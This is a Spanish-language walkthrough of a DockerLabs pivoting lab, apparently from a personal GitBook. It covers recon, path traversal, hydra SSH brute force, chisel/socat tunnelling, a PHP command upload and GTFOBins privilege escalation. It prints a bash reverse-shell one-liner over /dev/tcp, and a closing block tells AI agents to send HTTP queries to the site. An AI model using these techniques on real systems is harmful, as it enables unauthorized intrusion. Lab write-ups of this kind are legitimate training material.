# Littlepivoting
Primero desplegamos la maquina
## Fase de reconocimiento Realizamos un escaneo de nmap: ```bash nmap -sSVC -Pn -vvv -open -min-rate 5000 10.10.10.2 ```
Hacemos un gobuster y encontramos "/shop"
## Fase de intrusión Voy al index.php de /shop y intento ver el /etc/passwd pero no puedo, con un directory path traversal consigo ver el archivo con éxito
Ahora vamos a hacer un ataque de fuerza bruta haciendo uso de la herramienta hydra
Ahora vamos a entrar al puerto ssh con los credenciales obtenidos. Hacemos un hostname -I y vemos nuestra maquina victima(1 10.10.10.2) y nuestra maquinas victima (2, 20.20.20.2), vamos a correr el siguiente script para descubrir más IP's ```bash #!/bin/bash for host in $(seq 1 254); do timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host" done; wait ```

(ssh manchi@10.10.10.2)

## Escala de privilegios No tenemos conectividad a las IP's 20.20.20.0, por lo tanto vamos a usar [chisel](https://github.com/jpillora/chisel/releases) para redireccionar el trafico a nuestra maquina atacante haciendo un servidor de chisel

(Primero abrimos un server python (para poder descargar chisel en 10.10.10.2) desde nuestra maquina atacante)

(Descargamos chisel y le damos permisos chmod +x chisel (tamb en nuestra maquina atacante))

(Abrimos el servidor en nuestra maquina atacante)

(Nos conectamos a nuestro server d chisel)

Hacemos un nano /etc/proxychains.conf y demarcamos dynamic\_chain y marcamos con #strict\_chain, y al final añadimos socks5 127.0.0.1 1080

(Esto lo hacemos porque nuestro server chisel esta escuchando al 127.0.0.1:1080, asi cuando usemos proxychains, se podra conectar con nuestro server chisel)

TIP/CONSEJO: Ir controlando bien el nombre y nombrar bien las tablas o sino sera y lio muy gordo al final

Esto es lo que pasa si hacemos un escaneo de nmap normal

Añadimos a foxyproxy la IP con socks5 127.0.0.1:1080

Lo activamos y ya nos carga

Para que nos funcione el gobuster tenemos q añadir --proxy y añadir el proxy de nuestro server chisel, encontramos "/secret.php"
El usuario "Mario" me da que podria ser el usuario de ssh de 20.20.20.3, asi que vamos a usar hydra
Encontramos los credenciales rapidamente :D
Vamos a conectarnos con proxychains (obviamente porque sino, como podriamos llegar a la 20.20.20.3 sin pasar por nuestro server chisel? (el cual tiene conexion a la 10.10.10.2, q a su vez tiene conectividad a la 20.20.20.2 y a su vez la 20.20.20.3)) Actualizamos nuestro canvas
Vemos que todos los usuarios pueden ejecutar vim asi que vamos a buscar GTOBins para binarios vulnerables

Ejecutamos el binario vulnerable y obtenemos root

Bien, ahora vamos a correr el mismo script que de antes en busqueda de mas IP's, pero no funciona porque no tenenmos ping ```bash #!/bin/bash for host in $(seq 1 254); do timeout 1 bash -c "ping -c 1 30.30.30.$host &>/dev/null" && echo "[+] HOST - 30.30.30.$host is alive!" & done; wait ``` Asi que vamos a usar el siguiente: ```bash #!/bin/bash for host in $(seq 1 254); do timeout 1 bash -c "echo '' > /dev/tcp/30.30.30.$host/80 &>/dev/null" && echo "[+] HOST - 30.30.30.$host" & done; wait ```
Ahora a continuacion tendremos que usar socat, porque? Porque chisel solo puede redireccionar el trafico para adelante, encambio socat puede direccionar el trafico de otra maquina a otra (de puerto a puerto y ip). Instalar [socat ](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)en vuestra maquina atacante, os hara falta
Vamos a usar scp para poder mandar los archivos utilizaremos la herramienta scp

Nos abrimos un server para poder pasar socar a manchi (10.10.10.2)

Ya podemos cerrar el server de python recien creado

Como queremos q desde manchi se redireccione a nuestro server chisel, vamos a hacer lo siguiente desde mario root (20.20.20.3/30.30.30.2):

Lo que estaria haciendo es mandar el trafico a la 20.20.20.2 (manchi), y desde ahi a nuestro server chisel

Se nos ha conectado bien a nuestro server main chisel

Porque hemos puesto 1081 y no 1080? Porque el 1080 ya esta en uso por manchi, asi que vamos otra vez /etc/proxychains y vamos a añadir 127.0.0.1 1081
Añadimos a foxyproxy nuestro nuevo socks5 que nos dara acceso a la IP 30.30.30.3
Lo activamos y... Boom, tiene pinta que habra que subir una revershell como una casa

Nos creamos rapidamente un cmd en .php

Subimos el archivo

No se donde se ha subido entonces hago un escaneo rapido con gobuster

Encontramos la ruta rapidamente

Funciona correctamente, por lo tante voy a mandar una reserveshell

PERO antes de mandar la revershell tenemos que establecer 2 conexiones mas de socat

mandamos socat con scp

abrimos la conexcion con socat la cual redirije a la 20.20.20.2 (manchi)

Ahora si mandamos la revershell ```bash bash -c "bash -i >& /dev/tcp/30.30.30.2/5531 0>&1" ```
[Depuración de tty](/burple/cheats/depuracion-de-tty.md)
Vemos que root puede ejecutar sin contraseña env, asi que vamos a GTFOBins a buscar el binario vulnerable
Ya hubieramos conseguido root
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://burple.gitbook.io/burple/dockerlabs/medio/littlepivoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.